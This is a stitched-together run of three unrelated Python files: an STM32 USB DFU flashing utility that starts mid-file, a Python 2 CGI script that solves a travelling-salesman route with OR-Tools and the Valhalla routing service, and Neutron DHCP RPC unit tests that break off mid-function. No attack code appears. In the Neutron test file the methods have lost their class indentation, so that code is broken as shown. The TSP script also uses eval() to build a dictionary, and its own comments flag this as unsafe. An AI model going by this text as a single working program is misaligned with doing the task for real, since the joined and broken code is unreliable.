__DFU_UPLOAD = 2
__DFU_GETSTATUS = 3
__DFU_CLRSTATUS = 4
__DFU_GETSTATE = 5
__DFU_ABORT = 6
# DFU states (bState byte of the GETSTATUS response)
__DFU_STATE_APP_IDLE = 0x00
__DFU_STATE_APP_DETACH = 0x01
__DFU_STATE_DFU_IDLE = 0x02
__DFU_STATE_DFU_DOWNLOAD_SYNC = 0x03
__DFU_STATE_DFU_DOWNLOAD_BUSY = 0x04
__DFU_STATE_DFU_DOWNLOAD_IDLE = 0x05
__DFU_STATE_DFU_MANIFEST_SYNC = 0x06
__DFU_STATE_DFU_MANIFEST = 0x07
__DFU_STATE_DFU_MANIFEST_WAIT_RESET = 0x08
__DFU_STATE_DFU_UPLOAD_IDLE = 0x09
__DFU_STATE_DFU_ERROR = 0x0a
_DFU_DESCRIPTOR_TYPE = 0x21
# USB device handle (set by init())
__dev = None
# Verbose flag (set by main() from the command line)
__verbose = None
# USB DFU interface number
__DFU_INTERFACE = 0
def init():
    """Initializes the found DFU device so that we can program it.

    Raises ValueError when zero, or more than one, DFU device is attached.
    """
    global __dev
    devices = get_dfu_devices(idVendor=__VID, idProduct=__PID)
    if not devices:
        raise ValueError('No DFU device found')
    if len(devices) > 1:
        raise ValueError("Multiple DFU devices found")
    __dev = devices[0]
    # Claim DFU interface
    usb.util.claim_interface(__dev, __DFU_INTERFACE)
    # Clear status (perhaps left over from a previous session)
    clr_status()
def clr_status():
    """Clears any error status (perhaps left over from a previous session)."""
    # bmRequestType 0x21 = host-to-device, class request, interface recipient
    __dev.ctrl_transfer(0x21, __DFU_CLRSTATUS, 0, __DFU_INTERFACE,
                        None, __TIMEOUT)
def get_status():
    """Get the state of the last operation.

    Returns byte 4 of the 6-byte DFU_GETSTATUS response, which callers
    compare against the __DFU_STATE_* constants. The long 20s timeout
    (instead of __TIMEOUT) accommodates slow operations like mass erase.
    """
    stat = __dev.ctrl_transfer(0xA1, __DFU_GETSTATUS, 0, __DFU_INTERFACE,
                               6, 20000)
    # print (__DFU_STAT[stat[4]], stat)
    return stat[4]
def mass_erase():
    """Performs a MASS erase (i.e. erases the entire device)."""
    # Send DNLOAD with first byte=0x41 (erase command, no address = mass erase)
    __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE,
                        "\x41", __TIMEOUT)
    # Execute last command
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
        raise Exception("DFU: erase failed")
    # Check command state
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
        raise Exception("DFU: erase failed")
def page_erase(addr):
    """Erases a single page.

    @param addr: Start address of the page to erase.
    """
    if __verbose:
        print("Erasing page: 0x%x..." % (addr))
    # Send DNLOAD with first byte=0x41 and page address (little-endian u32)
    buf = struct.pack("<BI", 0x41, addr)
    __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE, buf, __TIMEOUT)
    # Execute last command
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
        raise Exception("DFU: erase failed")
    # Check command state
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
        raise Exception("DFU: erase failed")
def set_address(addr):
    """Sets the address for the next operation.

    @param addr: Target memory address (little-endian u32 on the wire).
    """
    # Send DNLOAD with first byte=0x21 (set-address command) and the address
    buf = struct.pack("<BI", 0x21, addr)
    __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE, buf, __TIMEOUT)
    # Execute last command
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
        raise Exception("DFU: set address failed")
    # Check command state
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
        raise Exception("DFU: set address failed")
def write_memory(addr, buf, progress=None, progress_addr=0, progress_size=0):
    """Writes a buffer into memory. This routine assumes that memory has
    already been erased.

    @param addr: Target start address.
    @param buf: Data to write.
    @param progress: Optional callback(progress_addr, bytes_done, progress_size)
        invoked every 256 chunks for UI updates.
    """
    xfer_count = 0
    xfer_bytes = 0
    xfer_total = len(buf)
    xfer_base = addr
    while xfer_bytes < xfer_total:
        if __verbose and xfer_count % 512 == 0:
            print ("Addr 0x%x %dKBs/%dKBs..." % (xfer_base + xfer_bytes,
                                                 xfer_bytes // 1024,
                                                 xfer_total // 1024))
        if progress and xfer_count % 256 == 0:
            progress(progress_addr, xfer_base + xfer_bytes - progress_addr,
                     progress_size)
        # Set mem write address
        set_address(xfer_base+xfer_bytes)
        # Send DNLOAD with fw data, 64 bytes per transfer
        chunk = min(64, xfer_total-xfer_bytes)
        __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 2, __DFU_INTERFACE,
                            buf[xfer_bytes:xfer_bytes + chunk], __TIMEOUT)
        # Execute last command
        if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
            raise Exception("DFU: write memory failed")
        # Check command state
        if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
            raise Exception("DFU: write memory failed")
        xfer_count += 1
        xfer_bytes += chunk
def write_page(buf, xfer_offset):
    """Writes a single page. This routine assumes that memory has already
    been erased.

    @param buf: Page data.
    @param xfer_offset: Offset from the flash base (0x08000000).
    """
    xfer_base = 0x08000000
    # Set mem write address
    set_address(xfer_base+xfer_offset)
    # Send DNLOAD with fw data
    __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 2, __DFU_INTERFACE, buf, __TIMEOUT)
    # Execute last command
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
        raise Exception("DFU: write memory failed")
    # Check command state
    if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
        raise Exception("DFU: write memory failed")
    if __verbose:
        print ("Write: 0x%x " % (xfer_base + xfer_offset))
def exit_dfu():
    """Exit DFU mode, and start running the program."""
    # set jump address to the start of flash
    set_address(0x08000000)
    # Send DNLOAD with 0 length to exit DFU
    __dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE,
                        None, __TIMEOUT)
    # Execute last command; the device should enter the MANIFEST state
    if get_status() != __DFU_STATE_DFU_MANIFEST:
        print("Failed to reset device")
    # Release device
    usb.util.dispose_resources(__dev)
def named(values, names):
    """Creates a dict with `names` as fields, and `values` as values."""
    field_names = names.split()
    return {field: value for field, value in zip(field_names, values)}
def consume(fmt, data, names):
    """Parses the struct defined by `fmt` from `data`, stores the parsed
    fields in a dict keyed by the whitespace-separated `names`. Returns
    the dict together with the data with the struct stripped off."""
    size = struct.calcsize(fmt)
    fields = struct.unpack(fmt, data[:size])
    parsed = dict(zip(names.split(), fields))
    return parsed, data[size:]
def cstring(string):
    """Extracts a null-terminated string from a byte array."""
    head, _sep, _rest = string.partition(b'\0')
    return head
def compute_crc(data):
    """Computes the CRC32 value for the data passed in.

    The DFU suffix stores the bitwise complement of the standard CRC32,
    masked to 32 bits (equivalent to the original's `-crc - 1`).
    """
    return 0xFFFFFFFF & ~zlib.crc32(data)
def read_dfu_file(filename):
    """Reads a DFU file, and parses the individual elements from the file.
    Returns an array of elements. Each element is a dictionary with the
    following keys:
        num     - The element index
        address - The address that the element data should be written to.
        size    - The size of the element data.
        data    - The element data.
    If an error occurs while parsing the file, then None is returned.
    """
    print("File: {}".format(filename))
    with open(filename, 'rb') as fin:
        data = fin.read()
    # CRC covers everything except the final 4 CRC bytes themselves
    crc = compute_crc(data[:-4])
    elements = []
    # Decode the DFU Prefix
    #
    # <5sBIB
    #   <   little endian
    #   5s  char[5]     signature   "DfuSe"
    #   B   uint8_t     version     1
    #   I   uint32_t    size        Size of the DFU file (not including suffix)
    #   B   uint8_t     targets     Number of targets
    dfu_prefix, data = consume('<5sBIB', data,
                               'signature version size targets')
    print (" %(signature)s v%(version)d, image size: %(size)d, "
           "targets: %(targets)d" % dfu_prefix)
    for target_idx in range(dfu_prefix['targets']):
        # Decode the Image Prefix
        #
        # <6sBI255s2I
        #   <       little endian
        #   6s      char[6]     signature   "Target"
        #   B       uint8_t     altsetting
        #   I       uint32_t    named       bool indicating if a name was used
        #   255s    char[255]   name        name of the target
        #   I       uint32_t    size        size of image (not incl prefix)
        #   I       uint32_t    elements    Number of elements in the image
        img_prefix, data = consume('<6sBI255s2I', data,
                                   'signature altsetting named name '
                                   'size elements')
        img_prefix['num'] = target_idx
        if img_prefix['named']:
            img_prefix['name'] = cstring(img_prefix['name'])
        else:
            img_prefix['name'] = ''
        print('    %(signature)s %(num)d, alt setting: %(altsetting)s, '
              'name: "%(name)s", size: %(size)d, elements: %(elements)d'
              % img_prefix)
        target_size = img_prefix['size']
        target_data, data = data[:target_size], data[target_size:]
        for elem_idx in range(img_prefix['elements']):
            # Decode target prefix
            #   <   little endian
            #   I   uint32_t    element address
            #   I   uint32_t    element size
            elem_prefix, target_data = consume('<2I', target_data, 'addr size')
            elem_prefix['num'] = elem_idx
            print('      %(num)d, address: 0x%(addr)08x, size: %(size)d'
                  % elem_prefix)
            elem_size = elem_prefix['size']
            elem_data = target_data[:elem_size]
            target_data = target_data[elem_size:]
            elem_prefix['data'] = elem_data
            elements.append(elem_prefix)
        if len(target_data):
            # Leftover bytes mean the declared sizes were inconsistent
            print("target %d PARSE ERROR" % target_idx)
    # Decode DFU Suffix
    #   <   little endian
    #   H   uint16_t    device  Firmware version
    #   H   uint16_t    product
    #   H   uint16_t    vendor
    #   H   uint16_t    dfu     0x11a   (DFU file format version)
    #   3s  char[3]     ufd     'UFD'
    #   B   uint8_t     len     16
    #   I   uint32_t    crc32
    dfu_suffix = named(struct.unpack('<4H3sBI', data[:16]),
                       'device product vendor dfu ufd len crc')
    print ('    usb: %(vendor)04x:%(product)04x, device: 0x%(device)04x, '
           'dfu: 0x%(dfu)04x, %(ufd)s, %(len)d, 0x%(crc)08x' % dfu_suffix)
    if crc != dfu_suffix['crc']:
        print("CRC ERROR: computed crc32 is 0x%08x" % crc)
        return
    data = data[16:]
    if data:
        print("PARSE ERROR")
        return
    return elements
class FilterDFU(object):
    """Class for filtering USB devices to identify devices which are in DFU
    mode.
    """
    def __call__(self, device):
        # NOTE(review): only the first interface of the first configuration
        # is examined -- the nested loops return on the first iteration.
        # Confirm this is sufficient for all targeted bootloaders.
        for cfg in device:
            for intf in cfg:
                return (intf.bInterfaceClass == 0xFE and
                        intf.bInterfaceSubClass == 1)
def get_dfu_devices(*args, **kwargs):
    """Returns a list of USB devices which are currently in DFU mode.
    Additional filters (like idProduct and idVendor) can be passed in to
    refine the search.
    """
    # find_all returns a generator; materialize it so callers can len() it
    return list(usb.core.find(*args, find_all=True,
                              custom_match=FilterDFU(), **kwargs))
def get_memory_layout(device):
    """Returns an array which identifies the memory layout. Each entry
    of the array will contain a dictionary with the following keys:
        addr      - Address of this memory segment
        last_addr - Last address contained within the memory segment.
        size      - size of the segment, in bytes
        num_pages - number of pages in the segment
        page_size - size of each page, in bytes
    """
    cfg = device[0]
    intf = cfg[(0, 0)]
    # The interface string descriptor encodes the layout as
    # "@name/<base addr>/<pages>*<size><unit><flags>,..." (DFuse convention)
    mem_layout_str = usb.util.get_string(device, 255, intf.iInterface)
    mem_layout = mem_layout_str.split('/')
    addr = int(mem_layout[1], 0)
    segments = mem_layout[2].split(',')
    seg_re = re.compile(r'(\d+)\*(\d+)(.)(.)')
    result = []
    for segment in segments:
        seg_match = seg_re.match(segment)
        num_pages = int(seg_match.groups()[0], 10)
        page_size = int(seg_match.groups()[1], 10)
        multiplier = seg_match.groups()[2]
        # Unit suffix: 'K' = KiB, 'M' = MiB (anything else means bytes)
        if multiplier == 'K':
            page_size *= 1024
        if multiplier == 'M':
            page_size *= 1024 * 1024
        size = num_pages * page_size
        last_addr = addr + size - 1
        result.append(named((addr, last_addr, size, num_pages, page_size),
                            "addr last_addr size num_pages page_size"))
        # Segments are laid out contiguously after the base address
        addr += size
    return result
def list_dfu_devices(*args, **kwargs):
    """Prints a list of devices detected in DFU mode."""
    devices = get_dfu_devices(*args, **kwargs)
    if not devices:
        print("No DFU capable devices found")
        return
    for device in devices:
        print("Bus {} Device {:03d}: ID {:04x}:{:04x}"
              .format(device.bus, device.address,
                      device.idVendor, device.idProduct))
        layout = get_memory_layout(device)
        print("Memory Layout")
        for entry in layout:
            print("    0x{:x} {:2d} pages of {:3d}K bytes"
                  .format(entry['addr'], entry['num_pages'],
                          entry['page_size'] // 1024))
def write_elements(elements, mass_erase_used, progress=None):
    """Writes the indicated elements into the target memory,
    erasing as needed.

    @param elements: Output of read_dfu_file().
    @param mass_erase_used: True when the chip was already mass-erased, so
        per-page erases can be skipped.
    @param progress: Optional callback(addr, offset, size) for UI updates.
    """
    mem_layout = get_memory_layout(__dev)
    for elem in elements:
        addr = elem['addr']
        size = elem['size']
        data = elem['data']
        elem_size = size
        elem_addr = addr
        if progress:
            progress(elem_addr, 0, elem_size)
        while size > 0:
            write_size = size
            if not mass_erase_used:
                for segment in mem_layout:
                    if addr >= segment['addr'] and \
                       addr <= segment['last_addr']:
                        # We found the page containing the address we want to
                        # write, erase it
                        page_size = segment['page_size']
                        page_addr = addr & ~(page_size - 1)
                        # Clamp the write so it never crosses a page boundary
                        if addr + write_size > page_addr + page_size:
                            write_size = page_addr + page_size - addr
                        page_erase(page_addr)
                        break
            write_memory(addr, data[:write_size], progress,
                         elem_addr, elem_size)
            data = data[write_size:]
            addr += write_size
            size -= write_size
        if progress:
            progress(elem_addr, addr - elem_addr, elem_size)
def cli_progress(addr, offset, size):
    """Prints a progress report suitable for use on the command line."""
    width = 25
    done = offset * width // size
    filled = '=' * done
    blank = ' ' * (width - done)
    percent = offset * 100 // size
    # Carriage return (no newline) so the bar redraws in place.
    print("\r0x{:08x} {:7d} [{}{}] {:3d}% "
          .format(addr, size, filled, blank, percent), end="")
    sys.stdout.flush()
    if offset == size:
        # Finished: move to the next line.
        print("")
def main():
    """Test program for verifying this file's functionality."""
    global __verbose
    # Parse CMD args
    parser = argparse.ArgumentParser(description='DFU Python Util')
    #parser.add_argument("path", help="file path")
    parser.add_argument(
        "-l", "--list",
        help="list available DFU devices",
        action="store_true",
        default=False
    )
    parser.add_argument(
        "-m", "--mass-erase",
        help="mass erase device",
        action="store_true",
        default=False
    )
    # NOTE(review): despite the help text, the file named by -u/--upload is
    # read from disk and written *to* the device below -- confirm intent.
    parser.add_argument(
        "-u", "--upload",
        help="read file from DFU device",
        dest="path",
        default=False
    )
    parser.add_argument(
        "-v", "--verbose",
        help="increase output verbosity",
        action="store_true",
        default=False
    )
    args = parser.parse_args()
    __verbose = args.verbose
    if args.list:
        list_dfu_devices(idVendor=__VID, idProduct=__PID)
        return
    try:
        init()
    except ValueError as er:
        print(str(er))
        sys.exit(1)
    if args.mass_erase:
        print ("Mass erase...")
        mass_erase()
    if args.path:
        elements = read_dfu_file(args.path)
        if not elements:
            return
        print("Writing memory...")
        write_elements(elements, args.mass_erase, progress=cli_progress)
        print("Exiting DFU...")
        exit_dfu()
        return
    # NOTE(review): also reached when only --mass-erase was requested.
    print("No command specified")


if __name__ == '__main__':
    main()
| |
#!/usr/bin/python
# Copyright 2015-2016 Arogi Inc
# Copyright 2010-2014 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Antonio Medrano and Timothy J. Niblett
"""A Traveling Salesman example that imports a JSON file problem definition and
solves using the Google OR-Tools solver using constraint progrmming. Note
that our test files include other data used to solve both the MCLP and
p-Median problems.
"""
import cgi
import json
import GISOps
import numpy as np
import requests
from ortools.constraint_solver import pywrapcp
from ortools.constraint_solver import routing_enums_pb2
import warnings
warnings.filterwarnings("ignore")
def main():
    """Solve the TSP for the submitted markers and fold the result into the
    global geojson (`js`)."""
    objective = readJSONandSolve()
    generateGEOJSON(objective)
def readJSONandSolve():
    """Parse the CGI-submitted geojson (global `receivedMarkerData`) and run
    the TSP solver; returns the objective value."""
    read_problem(receivedMarkerData, 1)
    objective = RunTSP()
    return objective
def RunTSP():
    """TSP using the Google OR-Tools constraint-programming model."""
    # Compute the pairwise distances between points first.
    PreComputeDistances()
    objective = SolveModel()
    return objective
def PreComputeDistances():
    """Fill the global distance matrix `d` (and coordinate array
    `xyPointArray`) using the Valhalla routing service."""
    # declare a couple module-level containers, sized from the global
    # numFeatures set by read_problem()
    global d
    global xyPointArray
    xyPointArray = [[None for k in range(2)] for j in range(numFeatures)]
    d = [[None for i in range(numFeatures)] for j in range(numFeatures)]
    # Get the distance as a function of the network using Valhalla
    response = pyCurl(xyPointArray)
    for k in range(numFeatures):
        for l in range(numFeatures):
            # Scaled by 10000 -- presumably so the solver's integer arc
            # costs keep enough precision; SolveModel divides it back out.
            d[k][l] = response['many_to_many'][k][l]['distance']*10000
def pyCurl(input): #Define function to send request
    """POST the point coordinates to the Valhalla many_to_many endpoint and
    return the decoded JSON response.

    Side effects: fills the module-level `xyPointArray` (passed in as
    `input` but mutated via the global) and sets the globals lat/lon/r.
    """
    global lat
    global lon
    global r #define the request object as r
    global path_length
    # Put your valhalla url here -- hardcoded service endpoint.
    url = 'http://valhalla:8002/many_to_many'
    # Define your headers here: in this case we are using json data
    headers = {'content-type': 'application/json'}
    # read in the coordinates and get their distances to each other
    # NOTE(review): this local numFeatures shadows the module global of the
    # same name (same value in practice, set from the same `js`).
    numFeatures = len(js['features'])
    i = 0;
    for line in js['features']:
        #Longitude
        xyPointArray[i][0] = line['geometry']['coordinates'][0]
        #Latitude
        xyPointArray[i][1] = line['geometry']['coordinates'][1]
        i += 1
    postJS = json.loads('{"costing": "auto", "units": "km"}')
    coords = []
    for i in range(numFeatures):
        lon = xyPointArray[i][0]
        lat = xyPointArray[i][1]
        # createDict eval()s the names 'lat'/'lon' -- see its docstring.
        coords.append(createDict('lat', 'lon'))
    postJS['locations'] = coords
    #define r as equal to the POST request
    r = requests.post(url, json = postJS, headers = headers)
    #capture server response
    response = r.json()
    return response
def createDict(*args):
    """Build a dict mapping each name in `args` to the value of the global
    variable of that name, resolved via eval().

    NOTE(review): eval() on the supplied names executes arbitrary Python;
    callers only pass the literals 'lat'/'lon', but this is fragile and
    unsafe for untrusted input.
    """
    return dict(((k, eval(k)) for k in args))
def Distance(i,j):
    """Arc-cost callback for the routing solver: distance from node i to
    node j, read from the precomputed global matrix `d`."""
    return d[i][j]
def SolveModel():
    """Solve the TSP and return the route length in the original distance
    units (the 10000x scaling from PreComputeDistances is divided out), or
    None when no route could be computed.

    Side effects: fills the global `routeCoord` with [from, to] node pairs.
    """
    global route
    global routeCoord
    warnings.filterwarnings("ignore")
    # Bug fix: `assignment` was previously unbound when numFeatures <= 1
    # (NameError) and None.ObjectiveValue() crashed when Solve() failed.
    assignment = None
    # Ensure that the data is valid for making a TSP route
    if numFeatures > 1:
        # Second argument = 1 to build a single tour (it's a TSP).
        # Nodes are indexed from 0 to numFeatures - 1; by default the start
        # of the route is node 0.
        routing = pywrapcp.RoutingModel(numFeatures, 1)
        search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
        # Setting first solution heuristic (cheapest addition).
        search_parameters.first_solution_strategy = (
            routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
        routing.SetArcCostEvaluatorOfAllVehicles(Distance)
        assignment = routing.Solve()
        if assignment:
            # Inspect the (single) route, recording each traversed edge.
            i = 0
            route_number = 0
            node = routing.Start(route_number)
            routeCoord = [None]*numFeatures
            while not routing.IsEnd(node):
                prevNode = int(node)
                node = assignment.Value(routing.NextVar(node))
                routeCoord[i] = [prevNode, int(node)]
                i += 1
            # Close the tour back to the start node.
            routeCoord[numFeatures-1] = [prevNode, int(routing.Start(route_number))]
        else:
            print('No solution found.')
    else:
        print('Specify an instance greater than 0.')
    if assignment:
        return assignment.ObjectiveValue()/10000.0
    return None
#
# Read a problem instance from a file
#
def read_problem(file, readType):
    """Read a problem instance and set the globals `js` and `numFeatures`.

    @param file: JSON text (readType == 1) or a file path (readType == 2).
    @param readType: 1 to parse `file` as a JSON string, 2 to load from disk.
    """
    global numFeatures
    global js
    try:
        if readType == 1:
            # `file` already holds the JSON text itself
            js = json.loads(file)
        elif readType == 2:
            with open(file,"r") as f:
                js = json.load(f)
    except IOError:
        print 'Error reading file'
        raise
    # count the number of point features to connect
    numFeatures = len(js['features'])
    return 1
### This function will return a geojson formatted string to send back to the web
### Since it is based on the p-Median/MCLP data files we can use some of those
### atributes to send back. In this case facilityLocated represents the 'from
### node' and assignedTo represents the 'to node' for the TSP.
def generateGEOJSON(objective):
    """Annotate the global geojson `js` with the TSP result: each feature
    gets thisNode/nextNode edge properties, and the objective value is
    stored at the top level."""
    for i in range(numFeatures):
        node = routeCoord[i][0]
        nextNode = routeCoord[i][1]
        js['features'][node]['properties']['thisNode'] = node
        js['features'][node]['properties']['nextNode'] = nextNode
    # if properties does not exist in the geojson, create it
    if 'properties' not in js:
        js['properties'] = {}
    # write the objective value into the geojson
    js['properties']['objective'] = objective
    ### As of this moment js is the output file... ready to be delivered
    ### back as the solution
    return 1
###########################################################
##################### The main controller code starts here.
###########################################################
# Create instance of FieldStorage and read the submitted geojson markers
form = cgi.FieldStorage()
receivedMarkerData = form.getvalue('useTheseMarkers')
# the magic happens here...
main()
# prepare for output... the GeoJSON should be returned as a string
transformedMarkerData = json.dumps(js)
# CGI response (Python 2 print statements -- this script is Python 2 only)
print "Content-type:text/html\r\n\r\n"
print transformedMarkerData
| |
# Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from neutron_lib import constants
from neutron_lib import exceptions as n_exc
from oslo_db import exception as db_exc
from neutron.api.rpc.handlers import dhcp_rpc
from neutron.callbacks import resources
from neutron.common import constants as n_const
from neutron.common import exceptions
from neutron.common import utils
from neutron.db import provisioning_blocks
from neutron.extensions import portbindings
from neutron.tests import base
class TestDhcpRpcCallback(base.BaseTestCase):
def setUp(self):
    """Patch the plugin manager, logging, quota tracking, port creation and
    the segments service plugin so DhcpRpcCallback runs in isolation."""
    super(TestDhcpRpcCallback, self).setUp()
    self.plugin_p = mock.patch('neutron.manager.NeutronManager.get_plugin')
    get_plugin = self.plugin_p.start()
    self.plugin = mock.MagicMock()
    get_plugin.return_value = self.plugin
    self.callbacks = dhcp_rpc.DhcpRpcCallback()
    self.log_p = mock.patch('neutron.api.rpc.handlers.dhcp_rpc.LOG')
    self.log = self.log_p.start()
    set_dirty_p = mock.patch('neutron.quota.resource_registry.'
                             'set_resources_dirty')
    self.mock_set_dirty = set_dirty_p.start()
    self.utils_p = mock.patch('neutron.plugins.common.utils.create_port')
    self.utils = self.utils_p.start()
    self.segment_p = mock.patch(
        'neutron.manager.NeutronManager.get_service_plugins')
    self.get_service_plugins = self.segment_p.start()
    self.segment_plugin = mock.MagicMock()
def test_group_by_network_id(self):
    """_group_by_network_id buckets ports by their network_id."""
    port1 = {'network_id': 'a'}
    port2 = {'network_id': 'b'}
    port3 = {'network_id': 'a'}
    grouped_ports = self.callbacks._group_by_network_id(
        [port1, port2, port3])
    expected = {'a': [port1, port3], 'b': [port2]}
    self.assertEqual(expected, grouped_ports)
def test_get_active_networks_info(self):
    """Each network is returned with its ports and subnets attached."""
    plugin_retval = [{'id': 'a'}, {'id': 'b'}]
    self.plugin.get_networks.return_value = plugin_retval
    port = {'network_id': 'a'}
    subnet = {'network_id': 'b', 'id': 'c'}
    self.plugin.get_ports.return_value = [port]
    self.plugin.get_subnets.return_value = [subnet]
    networks = self.callbacks.get_active_networks_info(mock.Mock(),
                                                       host='host')
    expected = [{'id': 'a', 'subnets': [], 'ports': [port]},
                {'id': 'b', 'subnets': [subnet], 'ports': []}]
    self.assertEqual(expected, networks)
def test_get_active_networks_info_with_routed_networks(self):
    """With a segments plugin, only subnets without a segment or on a
    segment reachable from the host are reported ('3' is filtered out)."""
    self.get_service_plugins.return_value = {
        'segments': self.segment_plugin
    }
    plugin_retval = [{'id': 'a'}, {'id': 'b'}]
    port = {'network_id': 'a'}
    subnets = [{'network_id': 'b', 'id': 'c', 'segment_id': '1'},
               {'network_id': 'a', 'id': 'e'},
               {'network_id': 'b', 'id': 'd', 'segment_id': '3'}]
    self.plugin.get_ports.return_value = [port]
    self.plugin.get_networks.return_value = plugin_retval
    hostseg_retval = ['1', '2']
    self.segment_plugin.get_segments_by_hosts.return_value = hostseg_retval
    self.plugin.get_subnets.return_value = subnets
    networks = self.callbacks.get_active_networks_info(mock.Mock(),
                                                       host='host')
    expected = [{'id': 'a', 'subnets': [subnets[1]], 'ports': [port]},
                {'id': 'b', 'subnets': [subnets[0]], 'ports': []}]
    self.assertEqual(expected, networks)
def _test__port_action_with_failures(self, exc=None, action=None):
    """Drive _port_action with `exc` raised by the plugin; the callback is
    expected to swallow the error and return None."""
    port = {
        'network_id': 'foo_network_id',
        'device_owner': constants.DEVICE_OWNER_DHCP,
        'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
    }
    self.plugin.create_port.side_effect = exc
    self.utils.side_effect = exc
    self.assertIsNone(self.callbacks._port_action(self.plugin,
                                                  mock.Mock(),
                                                  {'port': port},
                                                  action))
def _test__port_action_good_action(self, action, port, expected_call):
    """Assert _port_action dispatches the action to the expected call
    (create goes through plugin utils, update through the plugin)."""
    self.callbacks._port_action(self.plugin, mock.Mock(),
                                port, action)
    if action == 'create_port':
        self.utils.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY)
    else:
        self.plugin.assert_has_calls([expected_call])
def test_port_action_create_port(self):
    # 'create_port' is routed through neutron.plugins.common.utils.
    self._test__port_action_good_action(
        'create_port', mock.Mock(),
        mock.call.create_port(mock.ANY, mock.ANY))
def test_port_action_update_port(self):
    # 'update_port' is routed to the core plugin with the port id.
    fake_port = {'id': 'foo_port_id', 'port': mock.Mock()}
    self._test__port_action_good_action(
        'update_port', fake_port,
        mock.call.update_port(mock.ANY, 'foo_port_id', mock.ANY))
def test__port_action_bad_action(self):
    # Unknown action names must raise Invalid rather than be swallowed.
    self.assertRaises(
        n_exc.Invalid,
        self._test__port_action_with_failures,
        exc=None,
        action='foo_action')
def test_create_port_catch_network_not_found(self):
    # A vanished network during create is tolerated (returns None).
    self._test__port_action_with_failures(
        exc=n_exc.NetworkNotFound(net_id='foo_network_id'),
        action='create_port')
def test_create_port_catch_subnet_not_found(self):
    # A vanished subnet during create is tolerated (returns None).
    self._test__port_action_with_failures(
        exc=n_exc.SubnetNotFound(subnet_id='foo_subnet_id'),
        action='create_port')
def test_create_port_catch_db_reference_error(self):
    # A stale DB reference (row deleted concurrently) is tolerated.
    self._test__port_action_with_failures(
        exc=db_exc.DBReferenceError('a', 'b', 'c', 'd'),
        action='create_port')
def test_create_port_catch_ip_generation_failure_reraise(self):
    # IP allocation failure is re-raised when the subnet still exists.
    self.assertRaises(
        n_exc.IpAddressGenerationFailure,
        self._test__port_action_with_failures,
        exc=n_exc.IpAddressGenerationFailure(net_id='foo_network_id'),
        action='create_port')
def test_create_port_catch_and_handle_ip_generation_failure(self):
    # When the subnet is gone, both IP-generation failure and invalid
    # input are swallowed instead of re-raised.
    self.plugin.get_subnet.side_effect = (
        n_exc.SubnetNotFound(subnet_id='foo_subnet_id'))
    self._test__port_action_with_failures(
        exc=n_exc.IpAddressGenerationFailure(net_id='foo_network_id'),
        action='create_port')
    self._test__port_action_with_failures(
        exc=n_exc.InvalidInput(error_message='sorry'),
        action='create_port')
def test_update_port_missing_port_on_get(self):
    # A port deleted before the lookup makes update_dhcp_port a no-op.
    self.plugin.get_port.side_effect = n_exc.PortNotFound(port_id='66')
    self.assertIsNone(self.callbacks.update_dhcp_port(
        context='ctx', host='host', port_id='66',
        port={'port': {'network_id': 'a'}}))
def test_update_port_missing_port_on_update(self):
    # A port deleted between lookup and update makes update_dhcp_port a
    # no-op as well.
    self.plugin.get_port.return_value = {
        'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
    self.plugin.update_port.side_effect = n_exc.PortNotFound(port_id='66')
    self.assertIsNone(self.callbacks.update_dhcp_port(
        context='ctx', host='host', port_id='66',
        port={'port': {'network_id': 'a'}}))
def test_get_network_info_return_none_on_not_found(self):
    # An unknown network id yields None rather than an exception.
    self.plugin.get_network.side_effect = n_exc.NetworkNotFound(net_id='a')
    retval = self.callbacks.get_network_info(mock.Mock(), network_id='a')
    self.assertIsNone(retval)
def _test_get_network_info(self, segmented_network=False,
                           routed_network=False):
    """Shared body for the get_network_info tests: verifies subnets come
    back sorted by id and, for routed networks, filtered to the host's
    segments; ports are passed through untouched."""
    network_retval = dict(id='a')
    if not routed_network:
        subnet_retval = [dict(id='a'), dict(id='c'), dict(id='b')]
    else:
        subnet_retval = [dict(id='c', segment_id='1'),
                         dict(id='a', segment_id='1')]
    port_retval = mock.Mock()
    self.plugin.get_network.return_value = network_retval
    self.plugin.get_subnets.return_value = subnet_retval
    self.plugin.get_ports.return_value = port_retval
    if segmented_network:
        self.segment_plugin.get_segments.return_value = [dict(id='1'),
                                                         dict(id='2')]
        self.segment_plugin.get_segments_by_hosts.return_value = ['1']
    retval = self.callbacks.get_network_info(mock.Mock(), network_id='a')
    self.assertEqual(retval, network_retval)
    if not routed_network:
